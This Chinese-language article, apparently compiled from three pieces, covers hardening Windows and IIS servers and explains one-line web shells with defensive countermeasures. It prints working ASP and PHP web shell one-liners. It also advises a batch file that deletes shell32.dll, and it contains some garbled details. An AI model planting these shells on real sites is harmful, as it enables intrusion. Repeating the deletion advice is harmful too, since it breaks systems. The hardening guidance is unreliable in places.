防伺服器如何攻擊

1. 伺服器怎麼防攻擊

在頻頻惡意攻擊用戶、系統漏洞層出不窮的今天，作為網路治理員、系統治理員雖然在伺服器的安全上都下了不少功夫，諸如及時打上系統安全補丁、進行一些常規的安全配置，但有時仍不安全。因此必須惡意用戶入侵之前，通過一些系列安全設置，來將入侵者們擋在「安全門」之外，下面就將我在3A網路伺服器上做的一些最簡單、最有效的防(Overflow)溢出、本地提供許可權攻擊類的解決辦法給大家分享，小弟親自操刀，基本沒出過安全故障！

一、如何防止溢出類攻擊
1.盡最大的可能性將系統的漏洞補丁都打完，最好是比如Microsoft Windows Server系列的系統可以將自動更新服務打開，然後讓伺服器在您指定的某個時間段內自動連接到Microsoft Update網站進行補丁的更新。假如您的伺服器為了安全起見 禁止了對公網外部的連接的話，可以用Microsoft WSUS服務在內網進行升級。

2.停掉一切不需要的系統服務以及應用程序，最大限能的降底伺服器的被攻擊系數。比如前陣子的MSDTC溢出，就導致很多伺服器掛掉了。其實假如 WEB類伺服器根本沒有用到MSDTC服務時，您大可以把MSDTC服務停掉，這樣MSDTC溢出就對您的伺服器不構成任何威脅了。

3.啟動TCP/IP埠的過濾，僅打開常用的TCP如21、80、25、110、3389等埠;假如安全要求級別高一點可以將UDP埠關閉，當然假如這樣之後缺陷就是如在伺服器上連外部就不方便連接了，這里建議大家用IPSec來封UDP。在協議篩選中」只答應」TCP協議(協議號為：6)、 UDP協議(協議號為：17)以及RDP協議(協議號為：27)等必需用協議即可;其它無用均不開放。

4.啟用IPSec策略:為伺服器的連接進行安全認證，給伺服器加上雙保險。如三所說，可以在這里封掉一些危險的端品諸如:135 145 139 445 以及UDP對外連接之類、以及對通讀進行加密與只與有信任關系的IP或者網路進行通訊等等。(注:其實防反彈類木馬用IPSec簡單的禁止UDP或者不常用TCP埠的對外訪問就成了,關於IPSec的如何應用這里就不再敖續，可以到服安討論Search 「IPSec」，就 會有N多關於IPSec的應用資料..)

二、刪除、移動、更名或者用訪問控製表列Access Control Lists (ACLs)控制要害系統文件、命令及文件夾：

1.黑客通常在溢出得到shell後，來用諸如net.exe net1.exe ipconfig.exe user.exe query.exe regedit.exe regsvr32.exe 來達到進一步控制伺服器的目的如:加賬號了，克隆治理員了等等;這里可以將這些命令程序刪除或者改名。(注重:在刪除與改名時先停掉文件復制服務 (FRS)或者先將 %windir%\system32\dllcache\下的對應文件刪除或改名。

2.也或者將這些.exe文件移動到指定的文件夾,這樣也方便以後治理員自己使用

3.訪問控製表列ACLS控制：找到%windir%\system32下找到cmd.exe、cmd32.exe net.exe net1.exe ipconfig.exe tftp.exe ftp.exe user.exe reg.exe regedit.exe regedt32.exe regsvr32.exe 這些黑客常用的文件，在「屬性」→「安全」中對他們進行訪問的ACLs用戶進 行定義，諸如只給administrator有權訪問，假如需要防範一些溢出攻擊、以及溢出成功後對這些文件的非法利用，那麼只需要將system用戶在 ACLs中進行拒絕訪問即可。

4.假如覺得在GUI下面太麻煩的話，也可以用系統命令的CACLS.EXE來對這些.exe文件的Acls進行編輯與修改，或者說將他寫成一個.bat批處理 文件來執行以及對這些命令進行修改。(具體用戶自己參見cacls /? 幫助進行）

5.對磁碟如C/D/E/F等進行安全的ACLS設置從整體安全上考慮的話也是很有必要的，另外非凡是win2k，對Winnt、Winnt\System、Document and Setting等文件夾。

6.進行注冊表的修改禁用命令解釋器: (假如您覺得用⑤的方法太煩瑣的話，那麼您不防試試下面一勞永逸的辦法來禁止CMD的運行，通過修改注冊表，可以禁止用戶使用命令解釋器 (CMD.exe)和運行批處理文件(.bat文件)。具體方法:新建一個雙位元組(REG_DWord)執行 HKEY_CURRENT_USER\Software\PolicIEs\ Microsoft\Windows\System\DisableCMD，修改其值為1，命令解釋器和批處理文件都不能被運行。修改其值為2，則只是禁止命令解釋器的運行,反之將值改為0，則是打開CMS命令解釋器。假如您賺手動太麻煩的話,請將下面的代碼保存為*.reg文件，然後導入。

7.對一些以System許可權運行的系統服務進行降級處理。(諸如:將Serv-U、Imail、IIS、php、Mssql、Mysql等一系列以 System許可權運行的服務或者應用程序換成其它administrators成員甚至users許可權運行，這樣就會安全得多了…但前提是需要對這些基本運行狀態、調用API等相關情況較為了解. )

2. 如何防範伺服器被攻擊

一，首先伺服器一定要把administrator禁用，設置一個陷阱賬號:"Administrator"把它許可權降至最低,然後給一套非常復雜的密碼，重新建立
一個新賬號，設置上新密碼，許可權為administraor

然後刪除最不安全的組件：

建立一個BAT文件,寫入
regsvr32/u C:\WINDOWS\System32\wshom.ocx
del C:\WINDOWS\System32\wshom.ocx
regsvr32\u C:\WINDOWS\system32\shell32.dll
del C:\WINDOWS\system32\shell32.dll

二，IIS的安全：

1、不使用默認的Web站點，如果使用也要將 將IIS目錄與系統磁碟分開。

2、刪除IIS默認創建的Inetpub目錄(在安裝系統的盤上)。

3、刪除系統盤下的虛擬目錄，如:_vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、MSADC。

4、刪除不必要的IIS擴展名映射。

右鍵單擊「默認Web站點→屬性→主目錄→配置」，打開應用程序窗口，去掉不必要的應用程序映射。主要為.shtml, .shtm, .stm

5、更改IIS日誌的路徑

右鍵單擊「默認Web站點→屬性-網站-在啟用日誌記錄下點擊屬性

6、如果使用的是2000可以使用iislockdown來保護IIS，在2003運行的IE6.0的版本不需要。

八、其它

1、 系統升級、打操作系統補丁，尤其是IIS 6.0補丁、SQL SP3a補丁，甚至IE 6.0補丁也要打。同時及時跟蹤最新漏洞補丁;

2、停掉Guest 帳號、並給guest 加一個異常復雜的密碼，把Administrator改名或偽裝!

3、隱藏重要文件/目錄

可以修改注冊表實現完全隱藏:「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current-Version\Explorer\Advanced\Folder\Hi

-dden\SHOWALL」，滑鼠右擊 「CheckedValue」，選擇修改，把數值由1改為0

4、啟動系統自帶的Internet連接防火牆，在設置服務選項中勾選Web伺服器。

5、防止SYN洪水攻擊

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

新建DWORD值，名為SynAttackProtect，值為2

EnablePMTUDiscovery 值為0

NoNameReleaseOnDemand 值為1

EnableDeadGWDetect 值為0

KeepAliveTime 值為300,000

PerformRouterDiscovery 值為0

EnableICMPRedirects 值為0

6. 禁止響應ICMP路由通告報文

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface

新建DWORD值，名為PerformRouterDiscovery 值為0

7. 防止ICMP重定向報文的攻擊

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

將EnableICMPRedirects 值設為0

8. 不支持IGMP協議

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

新建DWORD值，名為IGMPLevel 值為0

9、禁用DCOM:

運行中輸入 Dcomcnfg.exe。 回車， 單擊「控制台根節點」下的「組件服務」。 打開「計算機」子文件夾。

對於本地計算機，請以右鍵單擊「我的電腦」，然後選擇「屬性」。選擇「默認屬性」選項卡。

清除「在這台計算機上啟用分布式 COM」復選框。

10.禁用服務里的
Workstation 這服務開啟的話可以利用這個服務，可以獲取伺服器所有帳號.

11阻止IUSR用戶提升許可權

三，這一步是比較關鍵的（禁用CMD運行）

運行-gpedit.msc-管理模板-系統
-阻止訪問命令提示符
-設置
-已啟用(E)
-也停用命令提示符腳本處理嗎?
(是)

四，防止SQL注入

打開SQL Server，在master庫用查詢分析器執行以下語句:

exec sp_dropextendedproc 'xp_cmdshell'

使用了以上幾個方法後，能有效保障你的伺服器不會隨便被人黑或清玩家數據，當然我技術有限，有的高手還有更多方法入侵你的伺服器，這

需要大家加倍努力去學習防黑技術，也希望高手們對我的評論給予指點，修正出更好的解決方案，對玩家的數據做出更有力的保障~~~

3. 網站入侵一句話木馬原理及防範

一句話木馬原理及防範

一、一句話木馬原理

一句話木馬，顧名思義，就是一段非常簡短的代碼，通常只有一行，用於實現遠程執行命令或控制伺服器的功能。它常見於網站入侵中，是黑客常用的攻擊手段之一。

1. 一句話木馬的形式

一句話木馬根據伺服器端腳本語言的不同，分為多種類型，如ASP、PHP、ASPX等。這些木馬通常以特定的腳本標簽包裹一段執行請求的代碼，例如：

• ASP一句話木馬：<%execute request("value")%>
• PHP一句話木馬：<?php @eval($_POST['value']); ?>

其中，「value」是黑客設定的密碼或參數名，用於接收客戶端提交的控制數據。

2. 工作原理

一句話木馬的工作原理相對簡單：當黑客將這段代碼插入到伺服器端的某個文件中（如ASP、PHP文件），該文件就變成了一個木馬服務端。黑客通過客戶端（如Web瀏覽器、專用黑客工具等）向這個木馬服務端提交控制數據，這些數據經過服務端處理後，會執行相應的入侵操作。

具體來說，黑客提交的數據會構成完整的腳本功能語句，並由伺服器端的解釋器執行。這樣，黑客就可以遠程式控制制伺服器，執行各種命令，如查看文件、修改數據、上傳下載文件等。

3. 連接成功的條件

一句話木馬能夠連接成功，通常需要滿足兩個前提條件：

• 伺服器端沒有禁止相關的組件或函數。例如，ASP一句話木馬需要伺服器端創建Adodb.Stream組件來寫入WebShell代碼，如果該組件被禁用，則無法寫入。
• 許可權問題。黑客需要擁有足夠的許可權來寫入和執行木馬代碼。如果當前的虛擬目錄禁止了user組或everyone寫入，那麼木馬將無法成功寫入。

二、防範一句話木馬

為了防範一句話木馬攻擊，可以採取以下措施：

1. 安裝安全殺毒軟體

在伺服器上安裝專業的安全殺毒軟體，如安全狗、360、護衛神等。這些軟體能夠實時監控伺服器的運行狀態，檢測並阻止惡意代碼的執行。同時，它們還能提供漏洞掃描、入侵檢測等功能，幫助管理員及時發現並修復潛在的安全隱患。

2. 定期備份伺服器數據

定期備份伺服器數據是防止數據丟失的重要措施。一旦伺服器被黑客入侵並造成數據損壞或丟失，可以通過備份數據來恢復系統。因此，建議管理員定期備份伺服器數據，並存儲在安全的位置。

3. 禁止相關許可權

為了降低被一句話木馬攻擊的風險，可以禁止伺服器里相關的許可權。例如，禁止寫入PHP等腳本文件，或者限制特定目錄的訪問許可權。這樣可以減少黑客利用漏洞寫入木馬代碼的機會。

4. 加強代碼審計和漏洞修復

定期對網站代碼進行審計和漏洞修復是防範一句話木馬的重要手段。通過代碼審計，可以發現並修復潛在的代碼漏洞和安全隱患。同時，及時關注並修復已知的漏洞，也可以降低被黑客利用的風險。

5. 使用防火牆和入侵檢測系統

在伺服器前端部署防火牆和入侵檢測系統（IDS），可以進一步提高伺服器的安全性。防火牆可以阻止未經授權的訪問和攻擊，而IDS則可以實時監測並報告可疑的網路活動。這些措施可以共同構建一個更加安全的網路環境。

6. 提高安全意識

最後，提高安全意識也是防範一句話木馬的重要一環。管理員應該了解常見的網路攻擊手段和防禦方法，並時刻保持警惕。同時，定期對員工進行安全培訓和教育，提高他們的安全意識和防範能力。

綜上所述，防範一句話木馬需要從多個方面入手，包括安裝安全殺毒軟體、定期備份伺服器數據、禁止相關許可權、加強代碼審計和漏洞修復、使用防火牆和入侵檢測系統以及提高安全意識等。只有綜合運用這些措施，才能有效地降低被一句話木馬攻擊的風險。